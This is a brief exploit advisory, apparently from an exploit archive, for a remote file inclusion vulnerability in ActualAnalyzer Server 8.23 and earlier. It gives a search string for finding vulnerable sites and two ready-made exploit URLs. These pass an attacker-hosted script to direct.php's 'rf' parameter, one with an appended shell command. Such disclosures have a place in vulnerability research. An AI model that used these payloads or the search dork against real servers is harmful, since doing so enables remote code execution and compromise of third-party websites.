id: 410
date: 05/07/2006
title: ActualAnalyzer Server <= 8.23 (rf) Remote File Include Vulnerability
author: Aesthetico
cves: 

====================================================================
ActualAnalyzer Server <= 8.23 (rf) Remote File Include Vulnerability
====================================================================





Title: ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: ActualScripts
URL: http://actualscripts.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "ActualScripts, Company. All rights reserved."
-----------------------------------------------------------------

Exploitation:

/direct.php?rf=http://www.yourspace.com/yourscript.php?
/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF



#  0day.today [2023-03-24]  #